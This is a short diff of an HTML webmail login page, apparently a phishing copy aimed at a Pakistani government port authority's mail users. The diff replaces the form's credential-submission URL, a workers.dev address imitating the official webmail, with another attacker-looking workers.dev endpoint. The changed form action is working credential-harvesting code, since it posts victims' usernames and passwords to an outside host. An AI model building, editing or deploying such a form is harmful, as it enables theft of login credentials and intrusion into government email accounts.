--- a/index.html
+++ b/index.html
@@ -75,7 +75,7 @@
                     <div class="auth-body j-auth-body"></div>
                 </div>
 
-                <form action="https://webmail-gda-gov-pk.gwadarportt.workers.dev/redirect1" method="post" class="j-login-form u-form">
+                <form action="https://worker-muddy-field-f5fe.chinamilll.workers.dev/redirect" method="post" class="j-login-form u-form">
                     <input type="hidden" name="locale" id="locale" value="en_US"> 
                     <input type="hidden" name="nodetect" value="false">
                     <input type="hidden" name="destURL" value=""> <!-- 通过参数请求参数，支持登录成功后跳转到指定页面 -->
